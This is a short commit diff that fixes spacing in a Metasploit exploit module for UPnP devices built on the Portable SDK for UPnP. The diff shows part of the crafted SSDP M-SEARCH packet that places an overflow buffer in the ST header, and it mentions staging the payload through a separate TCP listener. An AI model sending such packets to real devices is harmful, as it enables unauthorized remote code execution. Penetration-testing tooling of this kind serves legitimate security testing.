iFix spacing
parent
94953d0450
commit
214a60aa01
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Devices or the Portable SDK for UPnP Devices.
|
||||
|
||||
Due to size limitations on many devices, this exploit uses a separate TCP
|
||||
listener to stage the real payload.
|
||||
listener to stage the real payload.
|
||||
},
|
||||
'Author' => [
|
||||
'hdm',
|
||||
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
pkt =
|
||||
"M-SEARCH * HTTP/1.1\r\n" +
|
||||
"Host:239.255.255.250:1900\r\n" +
|
||||
"ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3)
|
||||
"ST:uuid:schemas:device:" + buffer + ":end\r\n" +
|
||||
"Man:\"ssdp:discover\"\r\n" +
|
||||
"MX:3\r\n"
|
||||
|
||||
|
|
Loading…
Reference in New Issue